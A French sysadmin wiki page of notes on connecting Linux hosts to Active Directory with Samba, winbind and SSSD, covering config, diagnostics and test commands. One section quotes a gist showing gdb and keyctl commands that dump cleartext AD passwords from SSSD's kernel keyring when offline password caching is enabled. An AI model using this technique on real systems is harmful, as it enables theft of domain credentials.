{{tag>Pb LDAP Auth Windows MDP}}

= Connexion AD Active Directory LDAP

Voir :
* [[Notes windows - Active Directory AD - Kerberos - WinRM]]
* [[Notes sssd]]
* realmd (config possible depuis Cockpit)

Voir aussi :
* Harden AD
* [[Windows - Active Directory - Vérifier si un compte AD est verrouillé]]







== Note install

<code - /etc/security/limits.d/samba.conf>
#root soft nofile 16384
#root hard nofile 16384
root - nofile 16384
</code>

<code bash>
wbinfo --ping-dc
</code>

<code bash>
net join ads -U useradmin -S cd1-plop.mydomain.local -d 3
</code>

<code ->
# wbinfo  --own-domain
MYDOMAIN
</code>


=== Sécu gdb

Source : https://gist.github.com/gladiatx0r/c52d529ea268f7e74295c2c492cf9774

<code ->
[domain/example.com]
krb5_store_password_if_offline = true
</code>

<code ->
for who ever this interest, if you enable krb5_store_password_if_offline   in the SSSD configuration, the AD password for accounts is stored in plaintext in the kernel keyring
to dump the clear text password you can do :

```
gdb -p <PID_OF_SSSD>
call system("keyctl show > /tmp/output")
```

From the /tmp/output locate the key_id for the user you want
Example of an output is : 
Session Keyring
 204928979 --alswrv      0     0  keyring: _ses
 471547288 --alswrv      0     0   \_ user: user@evilcorp.local
now again in GDB do the following : 

```
call system("keyctl print 471547288 > /tmp/output") # or whatever key_id from the past output
```

enjoy the cleartext password in /tmp/output :)
</code>


== Diag

Diagnostic 
* stop smbd, nmbd and winbindd (make sure they are really dead using ps. winbindd still lingered after I stopped the service)
* delete the samba from the PDC (using the Management Console)
* delete the secrets database (/var/lib/samba/secrets.tdb)
* join the domain again
* start the daemons again (smbd, nmbd and winbindd)

Source : https://ubuntuforums.org/showthread.php?t=1857135

<code bash>
sudo sssctl analyze request list --pam
</code>


== Utilisations diverses



== Pb

===  Pb connexion serveur AD / LDAP

Active Directory

Problème de connexion AD :

<code bash>
/etc/init.d/samba stop
/etc/init.d/winbind stop
/etc/init.d/winbind start
/etc/init.d/samba start
</code>





== Tester

Un compte particulier 
<code bash>
getent passwd DOMAIN/compteAD
id compteAD
</code>

Lister tous les comptes, les groupes
<code bash>
wbinfo -u
wbinfo -g
</code>